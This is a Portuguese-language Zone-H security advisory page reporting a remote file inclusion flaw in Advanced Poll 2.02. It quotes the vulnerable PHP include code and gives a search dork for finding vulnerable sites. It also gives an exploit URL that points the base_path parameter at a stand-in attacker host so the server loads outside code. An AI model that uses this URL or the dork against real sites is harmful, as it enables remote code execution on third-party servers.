Zone-H
Home arrow Avisos de Segurança arrow Advanced Poll ver 2.02 (base_path) Inclusão de arquivos remoto
03 de setembro de 2010
  
 
Ataques desta semana
O.S.  Defs.  %
Linux  9976  73.09%
Win 2003  3249  23.81%
FreeBSD  227  1.66%
Win 2000  66  0.48%
Unknown  48  0.35%
Other  82  0.60%

Total de ataques: 13648 dos quais 2757 único(s) no ip e 10891 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Advanced Poll ver 2.02 (base_path) Inclusão de arquivos remoto Imprimir E-mail
Avaliação do Usuário: / 5
PiorMelhor 
Por Marcelo Almeida (Vympel)   
22 de julho de 2006
Advanced Poll ver 2.02 (base_path) Inclusão de arquivos remoto
 
Site do desenvolvedor: http://www.proxy2.de/scripts.php     
Bug encontrado por: Solpot a.k.a (k. Hasibuan)
 
mail: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo
Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,  L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy home_edition2001 , Rendy ,Tje , m3lky , no-profile and all crew mardongan @ irc.dal.net

fonte do arquivo /admin/common.inc.php
$pollvars['SELF'] = basename($PHP_SELF);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
include ("$base_path/lang/$pollvars[lang]");
} else {
include ("$base_path/lang/english.php");

dica de busca : inurl:comments.php?action= send id

Falha :
http://algumsite/[path_advanced_poll]/admin/common.inc.php?base_path=http://atacante

Aviso original: Solpot

 
< Anterior   Próximo >
[Voltar]
 
Top!
(C) 2010 Zone-H - Unrestricted Information
Top!